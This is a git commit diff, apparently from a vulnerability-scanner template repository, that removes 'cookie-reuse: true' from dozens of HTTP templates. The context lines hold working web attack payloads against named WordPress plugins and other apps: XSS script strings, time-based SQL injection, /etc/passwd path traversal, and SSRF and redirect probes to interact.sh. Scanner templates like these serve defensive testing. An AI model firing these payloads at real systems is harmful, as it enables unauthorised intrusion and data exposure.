removed cookie-reuse
parent
8933d38ed8
commit
3a48ec7681
|
@ -28,7 +28,6 @@ http:
|
||||||
|
|
||||||
utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login
|
utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: xpath
|
- type: xpath
|
||||||
|
|
|
@ -25,7 +25,6 @@ http:
|
||||||
|
|
||||||
_authentication_token={{auth_token}}&username={{username}}&password={{password}}
|
_authentication_token={{auth_token}}&username={{username}}&password={{password}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
|
@ -27,7 +27,6 @@ http:
|
||||||
|
|
||||||
commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}}
|
commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: xpath
|
- type: xpath
|
||||||
|
|
|
@ -29,7 +29,6 @@ http:
|
||||||
|
|
||||||
{"username":"{{username}}","password":"{{password}}"}
|
{"username":"{{username}}","password":"{{password}}"}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
attack: pitchfork
|
attack: pitchfork
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
|
|
@ -33,7 +33,6 @@ http:
|
||||||
|
|
||||||
authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0
|
authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
attack: pitchfork
|
attack: pitchfork
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
|
|
@ -46,7 +46,6 @@ http:
|
||||||
|
|
||||||
lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings
|
lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -42,7 +42,6 @@ http:
|
||||||
GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1
|
GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
|
GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -40,7 +40,6 @@ http:
|
||||||
GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1
|
GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -40,7 +40,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1
|
GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
|
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -39,7 +39,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1
|
GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -38,7 +38,6 @@ http:
|
||||||
GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1
|
GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -37,7 +37,6 @@ http:
|
||||||
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
|
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
|
GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
redirects: true
|
redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1
|
GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1
|
GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1
|
GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1
|
GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1
|
GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1
|
GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1
|
GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1
|
GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1
|
GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1
|
GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1
|
GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/pagination/readme.txt HTTP/1.1
|
GET /wp-content/plugins/pagination/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1
|
GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/promobar/readme.txt HTTP/1.1
|
GET /wp-content/plugins/promobar/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1
|
GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/realty/readme.txt HTTP/1.1
|
GET /wp-content/plugins/realty/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1
|
GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1
|
GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1
|
GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/sender/readme.txt HTTP/1.1
|
GET /wp-content/plugins/sender/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/updater/readme.txt HTTP/1.1
|
GET /wp-content/plugins/updater/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/user-role/readme.txt HTTP/1.1
|
GET /wp-content/plugins/user-role/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 3
|
max-redirects: 3
|
||||||
|
|
||||||
|
|
|
@ -40,7 +40,6 @@ http:
|
||||||
|
|
||||||
csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register
|
csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -37,7 +37,6 @@ http:
|
||||||
GET /session/login HTTP/1.1
|
GET /session/login HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -39,7 +39,6 @@ http:
|
||||||
GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1
|
GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -38,7 +38,6 @@ http:
|
||||||
GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1
|
GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -42,7 +42,6 @@ http:
|
||||||
GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1
|
GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/account-owners.php HTTP/1.1
|
GET /assets/account-owners.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /admin/ssl-fields/ HTTP/1.1
|
GET /admin/ssl-fields/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/registrars.php HTTP/1.1
|
GET /assets/registrars.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /admin/dw/servers.php HTTP/1.1
|
GET /admin/dw/servers.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 3
|
max-redirects: 3
|
||||||
|
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/dns.php HTTP/1.1
|
GET /assets/dns.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/hosting.php HTTP/1.1
|
GET /assets/hosting.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/ssl-providers.php HTTP/1.1
|
GET /assets/ssl-providers.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/ssl-accounts.php HTTP/1.1
|
GET /assets/ssl-accounts.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/categories.php HTTP/1.1
|
GET /assets/categories.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -66,7 +66,6 @@ http:
|
||||||
GET /Uploads/{{randstr}}.php7 HTTP/1.1
|
GET /Uploads/{{randstr}}.php7 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -51,7 +51,6 @@ http:
|
||||||
|
|
||||||
form_build_id={{form_build_id}}
|
form_build_id={{form_build_id}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -35,7 +35,6 @@ http:
|
||||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -40,7 +40,6 @@ http:
|
||||||
GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
|
GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -56,7 +56,6 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
redirects: true
|
redirects: true
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
